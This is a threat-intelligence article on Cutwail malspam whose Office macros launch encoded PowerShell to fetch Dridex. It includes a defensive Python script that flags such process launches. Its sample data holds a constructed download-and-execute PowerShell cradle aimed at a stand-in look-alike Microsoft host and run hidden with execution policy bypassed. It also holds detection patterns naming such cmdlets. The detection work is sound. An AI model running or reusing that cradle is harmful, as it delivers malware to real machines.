Cutwail Botnet-Led Dridex and Malicious PowerShell Attacks Increase With New Scripts


IBM X-Force intelligence has observed an increase in Dridex-related network attacks led by the Cutwail botnet. Dridex arrives via e-mail as a second stage: the original document or spreadsheet carries booby-trapped macros, and recipients who unintentionally trigger them launch malware that installs further malware through a PowerShell script. X-Force is currently examining relatively smaller campaigns in Italy and Japan.

Malspam e-mails are the initial infection vector for these threats. Recipients receive unsolicited messages, mostly sent via the Cutwail botnet, carrying Microsoft Office file attachments. Cutwail was a popular cybercrime spam platform in 2009 and is still distributing spam for other cybercrime gangs; it has been the biggest botnet of its kind. In total, as of June 2020, at least 34% of all malicious PowerShell attacks observed by X-Force have been related to the Dridex payload. The uptick in PowerShell activity was already apparent at the beginning of 2020 and began to rise significantly in May 2020. Activity peaked in December 2020, when X-Force recorded an 80 percent increase in the total number of malicious PowerShell attacks over the previous six months.

In January 2021, both the PowerShell attacks and the Dridex-related attacks dropped off sharply, presumably marking the end of that campaign; a new campaign was then launched using different macros as well as other scripts.

In the cases X-Force investigated, the PowerShell command is instructed to bypass the local execution policy and runs a Base64-encoded command, which results in a request to a URL posing as a Microsoft domain. The script retrieves a malicious file from this typo-squatted domain. These basic steps vary by sample and campaign. The Dridex payload is an executable file; it masquerades as a hosting service process and begins its data-stealing routines while trying to evade detection.
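The chain described above, as a defender would triage it from process-creation telemetry: an added example that is not part of the article or of IBM X-Force's reporting. It parses constructed log records, decodes the Base64/UTF-16LE `-EncodedCommand` argument the way PowerShell itself does, and flags an Office parent process, an execution-policy bypass, a hidden window, a download cradle, and hostnames that look like typo-squats of `microsoft`. The record format, host names, the `.invalid` URL, the allow-list and the severity thresholds are all constructed for illustration.

```python
"""Triage of PowerShell process-creation records for the macro -> PowerShell -> download chain.
Added example: the log format and every sample value are constructed, not taken from X-Force."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Cmdlets / .NET members routinely used by loaders to fetch and run a second stage.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                         r"start-bitstransfer|net\.webclient|invoke-expression|\biex\b", re.I)
# powershell.exe accepts prefixes of parameter names, so match the common short forms too.
EP_BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
BRAND = "microsoft"
LEGIT_DOMAIN = "microsoft.com"   # constructed allow-list; extend with your own approved domains


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot look-alike labels such as rnicrosoft or micros0ft."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_typosquat(host: str) -> bool:
    """True when a hostname imitates the brand but is not under the legitimate domain."""
    host = host.lower()
    if host == LEGIT_DOMAIN or host.endswith("." + LEGIT_DOMAIN):
        return False
    for label in re.split(r"[.-]", host):
        if BRAND in label or 0 < levenshtein(label, BRAND) <= 2:
            return True
    return False


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of a UTF-16LE string; return it, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


@dataclass
class Finding:
    host: str
    parent: str
    indicators: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def severity(self) -> str:
        n = len(self.indicators)
        return "high" if n >= 4 else "medium" if n >= 2 else "low" if n else "none"


def analyse(record: str) -> Finding:
    """Record format (constructed): timestamp|host|parent_image|command_line."""
    _ts, host, parent, cmdline = record.split("|", 3)
    f = Finding(host=host, parent=parent)
    if parent.lower() in OFFICE_PARENTS:
        f.indicators.append("office_parent")
    if EP_BYPASS_RE.search(cmdline):
        f.indicators.append("execution_policy_bypass")
    if HIDDEN_RE.search(cmdline):
        f.indicators.append("hidden_window")
    f.decoded = decode_encoded_command(cmdline)
    if ENC_RE.search(cmdline):
        f.indicators.append("encoded_command")
    # Inspect the visible command line (minus the Base64 blob) plus whatever it decodes to.
    text = ENC_RE.sub("", cmdline) + " " + (f.decoded or "")
    if DOWNLOAD_RE.search(text):
        f.indicators.append("download_cradle")
    f.urls = URL_RE.findall(text)
    if any(looks_like_typosquat(urlparse(u).hostname or "") for u in f.urls):
        f.indicators.append("typosquat_domain")
    return f


# Constructed sample records: one benign, one admin script using a bypass, one macro-spawned loader.
SECOND_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://rnicrosoft.invalid/update')"
ENCODED = base64.b64encode(SECOND_STAGE.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    "2021-01-12T09:14:03Z|WS-0142|explorer.exe|powershell.exe -NoProfile -Command Get-Service Spooler",
    "2021-01-12T09:20:41Z|SRV-BKP01|cmd.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    f"2021-01-12T10:02:17Z|WS-0077|WINWORD.EXE|powershell.exe -w hidden -ep bypass -enc {ENCODED}",
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        fnd = analyse(rec)
        print(f"{fnd.host:<10} {fnd.severity:<6} {fnd.indicators} {fnd.urls}")
```

The decode step matters more than any single keyword: an encoded command hides `DownloadString` and the URL from naive string matching, so rules that only grep the raw command line miss exactly the sample the article describes. The look-alike check is deliberately loose (edit distance of two on any label) and should be paired with an allow-list of your own approved domains to keep false positives down.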

Looking at the sectors most commonly targeted across the managed security networks it monitors, X-Force finds that health care is the top target of the rise in PowerShell attacks. Ransomware attacks in particular tend to hit hospitals, which are pressured into paying heavy ransoms to protect patients and restore operations.

Dridex's operators work mainly with other cybercrime groups connected to Eastern Europe's organized criminal scene. In the past, Necurs had been Dridex's main spamming operation. Dridex has moved on and off Necurs and has relied on Emotet as the botnet that paves the way into corporate networks, as its strategy shifted from widespread infection to targeted attacks.